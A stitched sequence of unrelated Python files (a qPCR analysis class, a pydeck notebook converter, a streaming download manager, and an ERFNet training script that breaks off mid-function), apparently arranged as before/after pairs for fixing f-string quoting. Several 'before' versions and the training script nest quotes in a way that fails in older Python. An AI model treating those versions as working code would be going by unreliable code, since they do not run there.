plot_df = self.df[['Cp', 'xpos', 'ypos']].pivot(index='ypos',
columns='xpos')
sns.heatmap(plot_df)
def export_excel(self, normalizer_gene, readout_gene):
df = self.df.copy()
normalizer = df.loc[df.gene == normalizer_gene].set_index(
'sample').sort_index().Cp
xx = df.loc[df.gene == readout_gene].set_index('sample').sort_index()
values = []
for i, x in enumerate(xx.iterrows()):
values.append(x[1].Cp)
if i % 3 == 2: # now gapdh
for j in range(i - 2, i + 1):
values.append(normalizer.iloc[j])
if len(values) == 0:
raise ValueError(f'gene {readout_gene} does not exist')
pyperclip.copy('\n'.join(
['' if pd.isnull(v) else str(v) for v in values]))
def normalized_prism_df(self, grouping_func, normalizer_genes=None, control_group='WT', repl_normalization=True):
'''
'''
df = self.normalized_df(normalizer_genes)
df['grouping_series'] = df.apply(grouping_func, axis=1)
# bring into PRISM form
df = df.groupby(['grouping_series', 'gene'])['expression'].apply(lambda v: pd.Series(list(v))).unstack(-2).unstack(-1)
# normalize to WT
if repl_normalization:
df = df / df.loc[control_group]
else:
wt_mean = df.loc[control_group].unstack(-1).mean(axis=1)
df = df.groupby(axis=1, level=0).apply(lambda v: v/wt_mean[v.name])
return df
def raw_prism_df(self):
df = self.df.copy()
df['repl'] = df['ypos'] % 3
return df.set_index(['sample', 'gene', 'repl'])['Cp'].unstack(-2).unstack(-1)
| import re
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import pyperclip
import seaborn as sns
class QPCRAnalysis:
def __init__(self,
data,
genes,
samples,
ntc_cols=True,
columns_per_sample=2):
'''
data: can be a filename to a tsv as exported by the lightcycler or a dataframe
'''
self.samples = samples
self.genes = genes
if isinstance(data, pd.DataFrame):
df = data
else:
with open(data, 'r') as f:
self.experiment_name = re.match('Experiment: ([^ ]*)',
f.readline()).groups()[0]
df = pd.read_csv(data, sep='\t', skiprows=1)
df.drop('Name', inplace=True, axis=1)
df['ypos'] = df['Pos'].apply(lambda pos: ord(pos[0]) - ord('A'))
df['ypos'] -= df['ypos'].min()
ntc_row = df['ypos'].max()
df['xpos'] = df['Pos'].apply(lambda pos: int(pos[1:]))
# only consider non-NTCs here
df['xpos'] -= df.loc[df['ypos'] < ntc_row, 'xpos'].min()
if ntc_cols:
if ntc_cols is True:
ntc_cols = list(range(0, len(genes) * 2, 2))
self.ntcs = pd.Series(
df.loc[df['xpos'].isin(ntc_cols) & (df['ypos'] == ntc_row),
'Cp'].tolist(),
index=genes)
else:
self.ntcs = None
df = df[(df.ypos < ntc_row)
& (df.xpos < len(samples) * columns_per_sample)]
df['gene'] = self._assign_genes(df, genes, columns_per_sample)
df['sample'] = pd.Categorical(
df.xpos.apply(lambda xpos: samples[xpos // columns_per_sample]),
categories=samples,
ordered=True)
self.df = df[['sample', 'gene', 'Cp', 'xpos', 'ypos']]
def dropna(self):
na_index = self.df.index[self.df.Cp.isna()]
print(f'Deleting {len(na_index)} Nans')
self.df.drop(na_index, inplace=True)
def _assign_genes(self, df, genes, columns_per_sample):
def _gene(row):
index = ((row['ypos'] // 3) * columns_per_sample +
(row['xpos'] % columns_per_sample))
try:
return genes[index]
except IndexError:
print(index)
raise
return df.apply(_gene, axis=1)
def outliers(self):
df = self.df.copy()
triplet_deviations = df.groupby(['sample', 'gene'])['Cp'].std()
df['index'] = df.index
outlier_triplets = df.set_index(
['sample',
'gene']).loc[triplet_deviations.index[triplet_deviations > 0.5]]
outlier_ids = []
for name, group in outlier_triplets.groupby(level=['sample', 'gene']):
diffs = (group.Cp - group.Cp.mean())
if len(diffs) == 3:
sorted_diffs = diffs.abs().reset_index(drop=True).sort_values(ascending=False)
if sorted_diffs.iloc[0] > 1.5 * sorted_diffs.iloc[1]:
index = group.iloc[sorted_diffs.index[0]]['index']
outlier_ids.append(int(index))
# print(diffs.iloc[lid], df[df['index'] == index])
# elif len(diffs) == 2: # does this make sense? if we have two, then leave the two!
# # delete the larger one
# index = group.iloc[group.Cp.reset_index(
# drop=True).argmax()]['index']
return outlier_ids
def plot_outliers(self): # TODO
triplet_deviations = self.df.groupby(['sample', 'gene']).std()['Cp']
outlier_triplets = self.df.set_index(['sample', 'gene']).loc[
triplet_deviations.index[triplet_deviations > 0.5]].reset_index()
outlier_triplets['triplet_name'] = outlier_triplets['sample'].str.cat(
outlier_triplets.gene, sep='_')
sns.swarmplot(data=outlier_triplets.reset_index(),
x='triplet_name',
y='Cp')
plt.xticks(rotation=90)
def plot_cps(self, exclude_genes=[]):
plt.subplots(figsize=(10, 7))
# g = sns.barplot(y='Cp', hue='sample', x='gene', data=self.df.sort_values('sample'), dodge=True)
plot_df = self.df.sort_values('sample')
plot_df = plot_df[~plot_df.gene.isin(exclude_genes)]
g = sns.barplot(y='Cp',
hue='sample',
x='gene',
data=plot_df,
dodge=True)
plt.xticks(rotation=30)
plt.title('Raw Cp values')
plt.legend(ncol=3, loc='upper center', bbox_to_anchor=[0.5, -0.15])
def normalized_df(self, normalizers, exclude_genes=[], exclude_samples=[], include_samples=None, include_genes=None, norm_to_one=None):
'''
:include_samples: takes precedence over exclude_samples. Can be used to determ̀ine the plotting order
:include_genes: takes precedence over exclude_genes. Can be used to determ̀ine the plotting order
'''
assert len(normalizers) > 0, 'At least one normalizer is required'
means = self.df.groupby(['sample', 'gene']).mean().unstack()['Cp']
stds = self.df.groupby(['sample', 'gene']).std().unstack()['Cp']
summed_normalizers = None
for normalizer in normalizers:
if summed_normalizers is None:
summed_normalizers = means[normalizer]
else:
summed_normalizers = summed_normalizers + means[normalizer]
summed_normalizers = summed_normalizers / len(normalizers)
delta = means.subtract(
summed_normalizers, axis=0
) # normalization like this results in geometric mean normalization on mRNA expression level
non_normalization_genes = [
gene for gene in self.genes if gene not in normalizers
]
if include_genes:
plot_genes = [
gene for gene in include_genes
if gene in non_normalization_genes
]
else:
plot_genes = [
gene for gene in non_normalization_genes
if gene not in exclude_genes
]
delta_low = delta - stds
delta_high = delta + stds
q = np.power(2, -delta)
q_low = np.power(2, -delta_low)
q_high = np.power(2, -delta_high)
q_std = pd.concat(dict(q=q, q_low=q_low, q_high=q_high),
axis=1).std(axis=1, level=1)
# fig, ax = plt.subplots(figsize=(10, 5))
plot_df = q[plot_genes].stack().reset_index().rename(
columns={0: 'expression'})
plot_df['error'] = q_std[plot_genes].stack().reset_index()[0]
if include_samples is not None:
plot_df = plot_df[plot_df['sample'].isin(include_samples)]
plot_df['sample'] = pd.Categorical(plot_df['sample'],
categories=include_samples,
ordered=True)
plot_df.sort_values('sample', inplace=True)
else:
plot_df = plot_df[~plot_df['sample'].isin(exclude_samples)]
if include_genes:
plot_df['gene'] = pd.Categorical(plot_df['gene'],
categories=plot_genes,
ordered=True)
plot_df.sort_values('gene', inplace=True, kind='mergesort') # mergesort is stable
if norm_to_one:
normed = plot_df.set_index(['sample', 'gene']).groupby('gene').apply(lambda group: pd.DataFrame({
'expression': group['expression'] / group.loc[norm_to_one, 'expression'],
'error': group['error'] / group.loc[norm_to_one, 'expression']}))
return normed.reset_index()
else:
return plot_df
def plot_normalized(self,
normalizers,
exclude_genes=[],
exclude_samples=[],
include_samples=None,
include_genes=None,
colors=None,
legend=True,
norm_to_one=None,
**kwargs
):
'''
This has been built using the Ciaudo Lab Excel qPCR analysis sheet as template
'''
from moritzsphd.plot import grouped_barplot
plot_df = self.normalized_df(normalizers, exclude_genes, exclude_samples, include_samples, include_genes, norm_to_one)
fig = grouped_barplot(data=plot_df,
y='expression',
x='gene',
hue='sample',
yerr='error',
split_yaxis='gene',
colors=colors,
**kwargs
)
#sns.barplot(data=plot_df, y='expression', x='gene', hue='sample')
#plt.errorbar(x=plot_df['gene'], y=plot_df['expression'], fmt='none', yerror=plot_df['error'], ecolor='k', elinewidth=2)
plt.subplots_adjust(top=0.85)
plt.suptitle(
f'gene expression normalized by {"geometric mean of " if len(normalizers) > 1 else ""}{" and ".join(normalizers)}'
)
sns.despine()
if legend:
plt.legend(ncol=3, loc='upper center', bbox_to_anchor=[0.5, -0.1])
return fig
def drop_outliers(self):
self.df.drop(self.outliers(), inplace=True)
def plot_heatmap(self):
fig, ax = plt.subplots(figsize=(15, 7))
plot_df = self.df[['Cp', 'xpos', 'ypos']].pivot(index='ypos',
columns='xpos')
sns.heatmap(plot_df)
def export_excel(self, normalizer_gene, readout_gene):
df = self.df.copy()
normalizer = df.loc[df.gene == normalizer_gene].set_index(
'sample').sort_index().Cp
xx = df.loc[df.gene == readout_gene].set_index('sample').sort_index()
values = []
for i, x in enumerate(xx.iterrows()):
values.append(x[1].Cp)
if i % 3 == 2: # now gapdh
for j in range(i - 2, i + 1):
values.append(normalizer.iloc[j])
if len(values) == 0:
raise ValueError(f'gene {readout_gene} does not exist')
pyperclip.copy('\n'.join(
['' if pd.isnull(v) else str(v) for v in values]))
def normalized_prism_df(self, grouping_func, normalizer_genes=None, control_group='WT', repl_normalization=True):
'''
'''
df = self.normalized_df(normalizer_genes)
df['grouping_series'] = df.apply(grouping_func, axis=1)
# bring into PRISM form
df = df.groupby(['grouping_series', 'gene'])['expression'].apply(lambda v: pd.Series(list(v))).unstack(-2).unstack(-1)
# normalize to WT
if repl_normalization:
df = df / df.loc[control_group]
else:
wt_mean = df.loc[control_group].unstack(-1).mean(axis=1)
df = df.groupby(axis=1, level=0).apply(lambda v: v/wt_mean[v.name])
return df
def raw_prism_df(self):
df = self.df.copy()
df['repl'] = df['ypos'] % 3
return df.set_index(['sample', 'gene', 'repl'])['Cp'].unstack(-2).unstack(-1)
|
import json
from io import BytesIO
from pathlib import Path
from tokenize import tokenize
import click
SECTIONS = [
'md_buttons',
'md_install',
'py_install',
'md_create',
'py_create',
'md_script',
'py_script',
'md_display',
'py_display', ]
@click.command()
@click.option(
'-t',
'--template-path',
type=click.Path(exists=True, readable=True),
required=True,
help='Path to pydeck Jupyter Notebook template.')
@click.argument('files', nargs=-1)
def main(files, template_path):
for path in files:
try:
convert_file(path, template_path)
except Exception as e:
print(f'Failed on file: {path}')
print(e)
def convert_file(path, template_path):
"""Convert python script to Jupyter Notebook
Args:
- path: Path to _Python_ file
- template_path: Path to Jupyter Notebook template
"""
path = Path(path)
with open(path) as f:
lines = f.readlines()
ee_script_block = extract_ee_script(lines)
pydeck_block = convert_pydeck_block(ee_script_block)
# Load Pydeck notebook template
with open(template_path) as f:
template_lines = f.readlines()
# Find index of line to replace
replace_ind = [
ind for ind, x in enumerate(template_lines)
if 'REPLACE_WITH_CUSTOM_EE_SCRIPT' in x][0]
# Remove this template line
template_lines.pop(replace_ind)
# Insert into list
# Ref: https://stackoverflow.com/a/3748092
template_lines[replace_ind:replace_ind] = pydeck_block
# Create path for notebook in same directory
out_path = path.parents[0] / (path.stem + '.ipynb')
with open(out_path, 'w') as f:
f.writelines(template_lines)
def extract_ee_script(lines):
"""Extract EE script from python file
"""
# The nth section used for python script
n_section = [ind for ind, x in enumerate(SECTIONS) if x == 'py_script'][0]
# Find indices of blocks
# Each block starts with `# %%`
blocks_idx = [
ind for ind, x in enumerate(lines) if x.strip().startswith('# %')]
assert len(blocks_idx) == len(SECTIONS), 'wrong number of blocks'
# Find start, end indices of python script block
start_idx, end_idx = blocks_idx[n_section:n_section + 2]
return lines[start_idx:end_idx]
def convert_pydeck_block(lines):
"""
- Remove any `Map.setCenter` commands (todo in future: parse?)
- Extract `Map.addLayer`, use to create Image object that can be passed to Deck.gl
"""
out_lines = []
for line in lines:
stripped = line.lower().strip()
if not stripped.startswith('map'):
out_lines.append(line)
continue
if stripped.startswith('map.addlayer'):
line = handle_add_layer(line)
out_lines.append(line)
continue
if stripped.startswith('map.setcenter'):
line = handle_set_center(line)
out_lines.append(line)
continue
# stringify to put in JSON
out_lines = [json.dumps(l) for l in out_lines]
# Add ,\n to each line
out_lines = [l + ',\n' for l in out_lines]
# Remove , from last line
out_lines[-1] = out_lines[-1][:-2] + '\n'
return out_lines
def handle_add_layer(line):
"""Convert Map.addLayer to EarthEngineLayer
"""
# https://geemap.readthedocs.io/en/latest/readme.html#usage
# Args are: eeObject, visParams, name, shown, opacity
add_layer_args = tokenize_command(line, 5)
ee_object, vis_params, _, _, opacity = add_layer_args
kwargs = []
if ee_object:
kwargs.append(f'ee_object={ee_object}')
if vis_params:
kwargs.append(f'vis_params={vis_params}')
if opacity:
kwargs.append(f'opacity={opacity}')
return f"ee_layers.append(EarthEngineLayer({", ".join(kwargs)}))\n"
def handle_set_center(line):
"""Convert Map.setCenter to pydeck.ViewState
"""
# https://geemap.readthedocs.io/en/latest/readme.html#usage
# Args are: lon, lat, zoom
set_center_args = tokenize_command(line, 3)
longitude, latitude, zoom = set_center_args
kwargs = []
if longitude:
kwargs.append(f'longitude={longitude}')
if latitude:
kwargs.append(f'latitude={latitude}')
if zoom:
kwargs.append(f'zoom={zoom}')
return f"view_state = pdk.ViewState({", ".join(kwargs)})\n"
def tokenize_command(line, n_args):
tokens = tokenize_line(line)
args = [''] * n_args
args_counter = 0
depth = 0
for token in tokens:
# Haven't entered function yet
if depth == 0 and not (token.type == 53 and token.string == '('):
continue
if token.string in ['(', '{', '[']:
if depth > 0:
args[args_counter] += token.string
depth += 1
continue
if token.string in [')', '}', ']']:
if depth > 1:
args[args_counter] += token.string
depth -= 1
continue
if depth == 1 and token.string == ',':
args_counter += 1
continue
args[args_counter] += token.string
return args
def stringify(lines):
"""Wrap lines in double quotes, to allow to be saved in JSON
"""
return [json.dumps(l) for l in lines]
def tokenize_line(line):
"""
Ref: https://stackoverflow.com/a/54375074
"""
file = BytesIO(line.encode())
return list(tokenize(file.readline))
if __name__ == '__main__':
main()
| import json
from io import BytesIO
from pathlib import Path
from tokenize import tokenize
import click
SECTIONS = [
'md_buttons',
'md_install',
'py_install',
'md_create',
'py_create',
'md_script',
'py_script',
'md_display',
'py_display', ]
@click.command()
@click.option(
'-t',
'--template-path',
type=click.Path(exists=True, readable=True),
required=True,
help='Path to pydeck Jupyter Notebook template.')
@click.argument('files', nargs=-1)
def main(files, template_path):
for path in files:
try:
convert_file(path, template_path)
except Exception as e:
print(f'Failed on file: {path}')
print(e)
def convert_file(path, template_path):
"""Convert python script to Jupyter Notebook
Args:
- path: Path to _Python_ file
- template_path: Path to Jupyter Notebook template
"""
path = Path(path)
with open(path) as f:
lines = f.readlines()
ee_script_block = extract_ee_script(lines)
pydeck_block = convert_pydeck_block(ee_script_block)
# Load Pydeck notebook template
with open(template_path) as f:
template_lines = f.readlines()
# Find index of line to replace
replace_ind = [
ind for ind, x in enumerate(template_lines)
if 'REPLACE_WITH_CUSTOM_EE_SCRIPT' in x][0]
# Remove this template line
template_lines.pop(replace_ind)
# Insert into list
# Ref: https://stackoverflow.com/a/3748092
template_lines[replace_ind:replace_ind] = pydeck_block
# Create path for notebook in same directory
out_path = path.parents[0] / (path.stem + '.ipynb')
with open(out_path, 'w') as f:
f.writelines(template_lines)
def extract_ee_script(lines):
"""Extract EE script from python file
"""
# The nth section used for python script
n_section = [ind for ind, x in enumerate(SECTIONS) if x == 'py_script'][0]
# Find indices of blocks
# Each block starts with `# %%`
blocks_idx = [
ind for ind, x in enumerate(lines) if x.strip().startswith('# %')]
assert len(blocks_idx) == len(SECTIONS), 'wrong number of blocks'
# Find start, end indices of python script block
start_idx, end_idx = blocks_idx[n_section:n_section + 2]
return lines[start_idx:end_idx]
def convert_pydeck_block(lines):
"""
- Remove any `Map.setCenter` commands (todo in future: parse?)
- Extract `Map.addLayer`, use to create Image object that can be passed to Deck.gl
"""
out_lines = []
for line in lines:
stripped = line.lower().strip()
if not stripped.startswith('map'):
out_lines.append(line)
continue
if stripped.startswith('map.addlayer'):
line = handle_add_layer(line)
out_lines.append(line)
continue
if stripped.startswith('map.setcenter'):
line = handle_set_center(line)
out_lines.append(line)
continue
# stringify to put in JSON
out_lines = [json.dumps(l) for l in out_lines]
# Add ,\n to each line
out_lines = [l + ',\n' for l in out_lines]
# Remove , from last line
out_lines[-1] = out_lines[-1][:-2] + '\n'
return out_lines
def handle_add_layer(line):
"""Convert Map.addLayer to EarthEngineLayer
"""
# https://geemap.readthedocs.io/en/latest/readme.html#usage
# Args are: eeObject, visParams, name, shown, opacity
add_layer_args = tokenize_command(line, 5)
ee_object, vis_params, _, _, opacity = add_layer_args
kwargs = []
if ee_object:
kwargs.append(f'ee_object={ee_object}')
if vis_params:
kwargs.append(f'vis_params={vis_params}')
if opacity:
kwargs.append(f'opacity={opacity}')
return f"ee_layers.append(EarthEngineLayer({', '.join(kwargs)}))\n"
def handle_set_center(line):
"""Convert Map.setCenter to pydeck.ViewState
"""
# https://geemap.readthedocs.io/en/latest/readme.html#usage
# Args are: lon, lat, zoom
set_center_args = tokenize_command(line, 3)
longitude, latitude, zoom = set_center_args
kwargs = []
if longitude:
kwargs.append(f'longitude={longitude}')
if latitude:
kwargs.append(f'latitude={latitude}')
if zoom:
kwargs.append(f'zoom={zoom}')
return f"view_state = pdk.ViewState({', '.join(kwargs)})\n"
def tokenize_command(line, n_args):
tokens = tokenize_line(line)
args = [''] * n_args
args_counter = 0
depth = 0
for token in tokens:
# Haven't entered function yet
if depth == 0 and not (token.type == 53 and token.string == '('):
continue
if token.string in ['(', '{', '[']:
if depth > 0:
args[args_counter] += token.string
depth += 1
continue
if token.string in [')', '}', ']']:
if depth > 1:
args[args_counter] += token.string
depth -= 1
continue
if depth == 1 and token.string == ',':
args_counter += 1
continue
args[args_counter] += token.string
return args
def stringify(lines):
"""Wrap lines in double quotes, to allow to be saved in JSON
"""
return [json.dumps(l) for l in lines]
def tokenize_line(line):
"""
Ref: https://stackoverflow.com/a/54375074
"""
file = BytesIO(line.encode())
return list(tokenize(file.readline))
if __name__ == '__main__':
main()
|
import os
import time
from pathlib import Path
from typing import Optional
import fsspec
import posixpath
from aiohttp.client_exceptions import ServerDisconnectedError
from .. import config
from .download_manager import DownloadConfig, map_nested
from .file_utils import get_authentication_headers_for_url, is_local_path, is_relative_path, url_or_path_join
from .logging import get_logger
logger = get_logger(__name__)
BASE_KNOWN_EXTENSIONS = ["txt", "csv", "json", "jsonl", "tsv", "conll"]
def xjoin(a, *p):
"""
This function extends os.path.join to support the "::" hop separator. It supports both paths and urls.
A shorthand, particularly useful where you have multiple hops, is to “chain” the URLs with the special separator "::".
This is used to access files inside a zip file over http for example.
Let's say you have a zip file at https://host.com/archive.zip, and you want to access the file inside the zip file at /folder1/file.txt.
Then you can just chain the url this way:
zip://folder1/file.txt::https://host.com/archive.zip
The xjoin function allows you to apply the join on the first path of the chain.
Example::
>>> xjoin("zip://folder1::https://host.com/archive.zip", "file.txt")
zip://folder1/file.txt::https://host.com/archive.zip
"""
a, *b = a.split("::")
if is_local_path(a):
a = Path(a, *p).as_posix()
else:
a = posixpath.join(a, *p)
return "::".join([a] + b)
def _add_retries_to_file_obj_read_method(file_obj):
read = file_obj.read
max_retries = config.STREAMING_READ_MAX_RETRIES
def read_with_retries(*args, **kwargs):
for retry in range(1, max_retries + 1):
try:
out = read(*args, **kwargs)
break
except ServerDisconnectedError:
logger.warning(
f"Got diconnected from remote data host. Retrying in {config.STREAMING_READ_RETRY_INTERVAL}sec [{retry}/{max_retries}]"
)
time.sleep(config.STREAMING_READ_RETRY_INTERVAL)
else:
raise ConnectionError("Server Disconnected")
return out
file_obj.read = read_with_retries
def xopen(file, mode="r", *args, **kwargs):
"""
This function extends the builin `open` function to support remote files using fsspec.
It also has a retry mechanism in case connection fails.
The args and kwargs are passed to fsspec.open, except `use_auth_token` which is used for queries to private repos on huggingface.co
"""
if fsspec.get_fs_token_paths(file)[0].protocol == "https":
kwargs["headers"] = get_authentication_headers_for_url(file, use_auth_token=kwargs.pop("use_auth_token", None))
file_obj = fsspec.open(file, mode=mode, *args, **kwargs).open()
_add_retries_to_file_obj_read_method(file_obj)
return file_obj
class StreamingDownloadManager(object):
"""
Download manager that uses the "::" separator to naviguate through (possibly remote) compressed archives.
Contrary to the regular DownloadManager, the `download` and `extract` methods don't actually download nor extract
data, but they rather return the path or url that could be opened using the `xopen` function which extends the
builtin `open` function to stream data from remote files.
"""
def __init__(
self,
dataset_name: Optional[str] = None,
data_dir: Optional[str] = None,
download_config: Optional[DownloadConfig] = None,
base_path: Optional[str] = None,
):
self._dataset_name = dataset_name
self._data_dir = data_dir
self._download_config = download_config or DownloadConfig()
self._base_path = base_path or os.path.abspath(".")
@property
def manual_dir(self):
return self._data_dir
def download(self, url_or_urls):
url_or_urls = map_nested(self._download, url_or_urls, map_tuple=True)
return url_or_urls
def _download(self, url_or_filename):
if is_relative_path(url_or_filename):
# append the relative path to the base_path
url_or_filename = url_or_path_join(self._base_path, url_or_filename)
return url_or_filename
def extract(self, path_or_paths):
urlpaths = map_nested(self._extract, path_or_paths, map_tuple=True)
return urlpaths
def _extract(self, urlpath):
protocol = self._get_extraction_protocol(urlpath)
if protocol is None:
# no extraction
return urlpath
elif protocol == "gzip":
# there is one single file which is the uncompressed gzip file
return f"{protocol}://{os.path.basename(urlpath.split("::")[0]).rstrip(".gz")}::{urlpath}"
else:
return f"{protocol}://::{urlpath}"
def _get_extraction_protocol(self, urlpath) -> Optional[str]:
path = urlpath.split("::")[0]
if path.split(".")[-1] in BASE_KNOWN_EXTENSIONS:
return None
elif path.endswith(".gz") and not path.endswith(".tar.gz"):
return "gzip"
elif path.endswith(".zip"):
return "zip"
raise NotImplementedError(f"Extraction protocol for file at {urlpath} is not implemented yet")
def download_and_extract(self, url_or_urls):
return self.extract(self.download(url_or_urls))
| import os
import time
from pathlib import Path
from typing import Optional
import fsspec
import posixpath
from aiohttp.client_exceptions import ServerDisconnectedError
from .. import config
from .download_manager import DownloadConfig, map_nested
from .file_utils import get_authentication_headers_for_url, is_local_path, is_relative_path, url_or_path_join
from .logging import get_logger
logger = get_logger(__name__)
BASE_KNOWN_EXTENSIONS = ["txt", "csv", "json", "jsonl", "tsv", "conll"]
def xjoin(a, *p):
"""
This function extends os.path.join to support the "::" hop separator. It supports both paths and urls.
A shorthand, particularly useful where you have multiple hops, is to “chain” the URLs with the special separator "::".
This is used to access files inside a zip file over http for example.
Let's say you have a zip file at https://host.com/archive.zip, and you want to access the file inside the zip file at /folder1/file.txt.
Then you can just chain the url this way:
zip://folder1/file.txt::https://host.com/archive.zip
The xjoin function allows you to apply the join on the first path of the chain.
Example::
>>> xjoin("zip://folder1::https://host.com/archive.zip", "file.txt")
zip://folder1/file.txt::https://host.com/archive.zip
"""
a, *b = a.split("::")
if is_local_path(a):
a = Path(a, *p).as_posix()
else:
a = posixpath.join(a, *p)
return "::".join([a] + b)
def _add_retries_to_file_obj_read_method(file_obj):
read = file_obj.read
max_retries = config.STREAMING_READ_MAX_RETRIES
def read_with_retries(*args, **kwargs):
for retry in range(1, max_retries + 1):
try:
out = read(*args, **kwargs)
break
except ServerDisconnectedError:
logger.warning(
f"Got diconnected from remote data host. Retrying in {config.STREAMING_READ_RETRY_INTERVAL}sec [{retry}/{max_retries}]"
)
time.sleep(config.STREAMING_READ_RETRY_INTERVAL)
else:
raise ConnectionError("Server Disconnected")
return out
file_obj.read = read_with_retries
def xopen(file, mode="r", *args, **kwargs):
"""
This function extends the builin `open` function to support remote files using fsspec.
It also has a retry mechanism in case connection fails.
The args and kwargs are passed to fsspec.open, except `use_auth_token` which is used for queries to private repos on huggingface.co
"""
if fsspec.get_fs_token_paths(file)[0].protocol == "https":
kwargs["headers"] = get_authentication_headers_for_url(file, use_auth_token=kwargs.pop("use_auth_token", None))
file_obj = fsspec.open(file, mode=mode, *args, **kwargs).open()
_add_retries_to_file_obj_read_method(file_obj)
return file_obj
class StreamingDownloadManager(object):
"""
Download manager that uses the "::" separator to naviguate through (possibly remote) compressed archives.
Contrary to the regular DownloadManager, the `download` and `extract` methods don't actually download nor extract
data, but they rather return the path or url that could be opened using the `xopen` function which extends the
builtin `open` function to stream data from remote files.
"""
def __init__(
self,
dataset_name: Optional[str] = None,
data_dir: Optional[str] = None,
download_config: Optional[DownloadConfig] = None,
base_path: Optional[str] = None,
):
self._dataset_name = dataset_name
self._data_dir = data_dir
self._download_config = download_config or DownloadConfig()
self._base_path = base_path or os.path.abspath(".")
@property
def manual_dir(self):
return self._data_dir
def download(self, url_or_urls):
url_or_urls = map_nested(self._download, url_or_urls, map_tuple=True)
return url_or_urls
def _download(self, url_or_filename):
if is_relative_path(url_or_filename):
# append the relative path to the base_path
url_or_filename = url_or_path_join(self._base_path, url_or_filename)
return url_or_filename
def extract(self, path_or_paths):
urlpaths = map_nested(self._extract, path_or_paths, map_tuple=True)
return urlpaths
def _extract(self, urlpath):
protocol = self._get_extraction_protocol(urlpath)
if protocol is None:
# no extraction
return urlpath
elif protocol == "gzip":
# there is one single file which is the uncompressed gzip file
return f"{protocol}://{os.path.basename(urlpath.split('::')[0]).rstrip('.gz')}::{urlpath}"
else:
return f"{protocol}://::{urlpath}"
def _get_extraction_protocol(self, urlpath) -> Optional[str]:
path = urlpath.split("::")[0]
if path.split(".")[-1] in BASE_KNOWN_EXTENSIONS:
return None
elif path.endswith(".gz") and not path.endswith(".tar.gz"):
return "gzip"
elif path.endswith(".zip"):
return "zip"
raise NotImplementedError(f"Extraction protocol for file at {urlpath} is not implemented yet")
def download_and_extract(self, url_or_urls):
return self.extract(self.download(url_or_urls))
|
import os
import time
from argparse import ArgumentParser
from os import makedirs
from os.path import basename, exists
from shutil import copyfile
import torch
import torch.backends.cudnn as cudnn
from torch import nn
from torch.optim import Adam, lr_scheduler
from torch.utils.data import DataLoader
from config.config import TRAIN_RESOLUTION
from dataset.dataset_metadata import get_dataset_metadata
from dataset.dataset_seg import get_dataset
from dataset.dataset_transforms import get_transform_seg
from model.erfnet import ERFNet
from utils.class_weights import get_class_weights
from utils.iou_meter import IoUMeter
from utils.logger import AutomatedLogger
from utils.misc import copy_object_sourcefile
device = torch.device('cuda')
def save_train_state(args, max_iou, enc: bool, epoch: int, is_best, model, optimizer, savedir, scheduler):
if enc:
path_checkpoint = savedir + '/checkpoint_enc.pth.tar'
path_best = savedir + '/model_best_enc.pth.tar'
else:
path_checkpoint = savedir + '/checkpoint.pth.tar'
path_best = savedir + '/model_best.pth.tar'
save_checkpoint({
'epoch': epoch + 1,
'arch': str(model),
'state_dict': model.state_dict(),
'best_acc': max_iou,
'optimizer': optimizer.state_dict(),
'scheduler': scheduler.state_dict(),
}, is_best, path_checkpoint, path_best)
if (enc):
filename = f'{savedir}/model_encoder-{epoch:03}.pth'
path_best = f'{savedir}/model_encoder_best.pth'
else:
filename = f'{savedir}/model-{epoch:03}.pth'
path_best = f'{savedir}/model_best.pth'
if args.epochs_save > 0 and epoch > 0 and epoch % args.epochs_save == 0:
torch.save(model.state_dict(), filename)
print(f'save: {filename} (epoch: {epoch})')
if (is_best):
torch.save(model.state_dict(), path_best)
print(f'save: {path_best} (epoch: {epoch})')
def load_train_resume(enc, model, optimizer, savedir, scheduler):
if enc:
path_checkpoint = savedir + '/checkpoint_enc.pth.tar'
else:
path_checkpoint = savedir + '/checkpoint.pth.tar'
assert os.path.exists(path_checkpoint)
checkpoint = torch.load(path_checkpoint)
start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
max_iou = checkpoint['best_acc']
scheduler.load_state_dict(checkpoint['scheduler'])
print(f'checkpoint for epoch {checkpoint['epoch']} loaded')
return max_iou, start_epoch
def get_DataLoaders(args, enc):
res = TRAIN_RESOLUTION[args.dataset + '_video']
pair_transform = get_transform_seg(args.dataset, enc, augment=True, height=res.height, width=res.width)
pair_transform_val = get_transform_seg(args.dataset, enc, augment=False, height=res.height, width=res.width)
dataset_train = get_dataset(args.dataset, args.datalist, pair_transform, 'train', args.kth_frame)
dataset_val = get_dataset(args.dataset, args.datalist, pair_transform_val, 'val')
pin_mem = not args.no_pin_memory
print(f'Pin memory: {pin_mem}')
loader_train = DataLoader(dataset_train, num_workers=args.num_workers, batch_size=args.batch_size, shuffle=True, pin_memory=pin_mem)
loader_val = DataLoader(dataset_val, num_workers=args.num_workers, batch_size=args.batch_size, shuffle=False, pin_memory=pin_mem)
return loader_train, loader_val
def trainer(args, model, enc, epoch_callback_before=None):
datasetMeta = get_dataset_metadata(args.dataset)
res = TRAIN_RESOLUTION[args.dataset + '_video']
weight = get_class_weights(args.dataset, args.datalist, enc, res.height, res.width, args.num_workers, args.batch_size, args.kth_frame).to(device)
print(f'Weights are: {weight}')
criterion = nn.CrossEntropyLoss(ignore_index=datasetMeta.IGNORE_INDEX, reduction='mean', weight=weight)
optimizer = Adam(model.parameters(), lr=5e-4, weight_decay=1e-4, betas=(0.9, 0.999))
lam = lambda epoch: pow((1 - (epoch / args.num_epochs)), 0.9)
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lam)
return train(args, model, enc, criterion, optimizer, scheduler, epoch_callback_before)
def train(args, model, enc, criterion, optimizer, scheduler, epoch_callback_before=None):
max_iou = 0
loader_train, loader_val = get_DataLoaders(args, enc)
print(f'Dataset size train: {len(loader_train.dataset)}, val: {len(loader_val.dataset)}')
savedir = args.savedir
logger = AutomatedLogger(savedir, enc)
start_epoch = 1
if args.resume:
max_iou, start_epoch = load_train_resume(enc, model, optimizer, savedir, scheduler)
datasetMeta = get_dataset_metadata(args.dataset)
for epoch in range(start_epoch, args.num_epochs + 1):
if epoch_callback_before:
epoch_callback_before(epoch, model)
curr_lr = 0
for param_group in optimizer.param_groups:
curr_lr = float(param_group['lr'])
print("CURRENT LR: ", param_group['lr'])
iouTrain = IoUMeter(datasetMeta.NUM_CLASSES, datasetMeta.IGNORE_INDEX) if args.train_iou else None
average_epoch_loss_train = do_train_epoch(args, model, optimizer, scheduler, criterion, loader_train, enc, epoch, iouTrain)
